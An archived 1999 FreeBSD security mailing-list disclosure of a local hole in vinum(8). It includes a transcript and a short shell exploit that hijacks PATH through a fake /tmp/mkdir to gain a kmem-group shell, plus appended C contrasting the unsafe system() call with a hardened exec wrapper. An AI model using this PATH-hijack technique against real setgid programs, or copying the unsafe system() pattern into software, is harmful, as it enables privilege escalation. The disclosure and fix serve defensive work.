Date: Wed, 27 Jan 1999 10:50:39 -0700 (MST)
From: Paul Hart <hart@iserver.com>
To: freebsd-security@FreeBSD.ORG
Subject: Large security hole in vinum(8) in 3.0-RELEASE
Message-ID: <Pine.BSF.3.96.990127103410.19271A-100000@anchovy.orem.iserver.com>
On January 13, 1999 (two weeks ago), I notified the FreeBSD security officer and the author of vinum(8) of a large security hole that affects vinum(8) in 3.0-RELEASE. It seems appropriate to disclose this hole now in a public forum, seeing as the author has corrected the problem.

In at least 3.0-RELEASE /sbin/vinum is SGID kmem and can be leveraged to run arbitrary code with an EGID of kmem. Now this is not as bad a hole as, say, a root compromise, but it can lead to a number of serious local attacks against a FreeBSD host, such as examining the contents of /dev/mem or /dev/kmem, which could in turn be leveraged for root access.

Here is a transcript of what I mean:

    % uname -r
    3.0-RELEASE
    % id
    uid=100(hart) gid=100(hart) groups=100(hart), 0(wheel)
    % ./vino
    $ id
    uid=100(hart) gid=100(hart) egid=2(kmem) groups=2(kmem), 100(hart), 0(wheel)
    $

Whoops! My sample exploit code (vino) is:

    #!/bin/sh
    PATH=/tmp:$PATH
    echo "#!/bin/sh
    exec /bin/sh" > /tmp/mkdir
    chmod 755 /tmp/mkdir
    /sbin/vinum

Looking through the code to vinum(8), the problem can be traced to the dangerous use of system(3) in a privileged program. But as it turns out, vinum(8) doesn't need to be SGID. From discussion with the author, this installation mode appears to have crept into the vinum(8) Makefile from the Makefile for ccdconfig(8) by accident. So this turns out to be easy to fix -- simply remove the SGID bit from /sbin/vinum.

Paul Hart

--
Paul Robert Hart        ><8>  ><8>  ><8>        Verio Web Hosting, Inc.
hart@iserver.com        ><8>  ><8>  ><8>        http://www.iserver.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
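The exploit in the post works because vinum(8) ran while SGID kmem and called system(3), so /bin/sh resolved "mkdir" through the caller's PATH with the kmem group still in effect. The C below is an added example, not code from the mail or from vinum; it puts that unsafe pattern beside a hardened replacement (a PATH audit helper and a wrapper that execs an absolute path with a fixed environment and the real ids). The names make_dir_unsafe, path_has_untrusted_entry and run_unprivileged are my own.

```c
/* Added example (not the mail's or vinum's code): unsafe pattern vs. hardened form. */
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/wait.h>
/* UNSAFE: system(3) hands the command to /bin/sh, which resolves "mkdir"
 * through the caller's PATH while the caller's effective gid (kmem) is still
 * in force; a /tmp/mkdir placed first in PATH is what runs. Contrast only. */
int make_dir_unsafe(void) { return system("mkdir -p /tmp/demo"); }

/* Audit helper: returns 1 if PATH holds an entry a privileged program must
 * not trust: an empty entry (sh treats it as "."), a relative entry, a
 * non-directory, or a world-writable directory such as /tmp. */
int path_has_untrusted_entry(const char *path)
{
    if (path == NULL || *path == '\0') return 0;
    for (const char *p = path;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        char entry[4096];
        struct stat st;
        if (len == 0 || len >= sizeof entry) return 1;   /* "" or absurdly long */
        memcpy(entry, p, len);
        entry[len] = '\0';
        if (entry[0] != '/' || stat(entry, &st) != 0 || !S_ISDIR(st.st_mode) ||
            (st.st_mode & S_IWOTH)) return 1;
        if (end == NULL) return 0;
        p = end + 1;
    }
}

/* SAFE: run an absolute-path program with a fixed environment and with the
 * effective ids reset to the real ids, so a setgid/setuid bit on the caller
 * is not inherited. Returns the child's exit status, or -1 on error. */
int run_unprivileged(const char *abs_path, char *const argv[])
{
    static char *const clean_env[] = { "PATH=/bin:/sbin:/usr/bin:/usr/sbin", NULL };
    if (abs_path == NULL || abs_path[0] != '/') return -1;  /* no PATH lookup */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0) _exit(127);
        execve(abs_path, argv, clean_env);
        _exit(127);                                          /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```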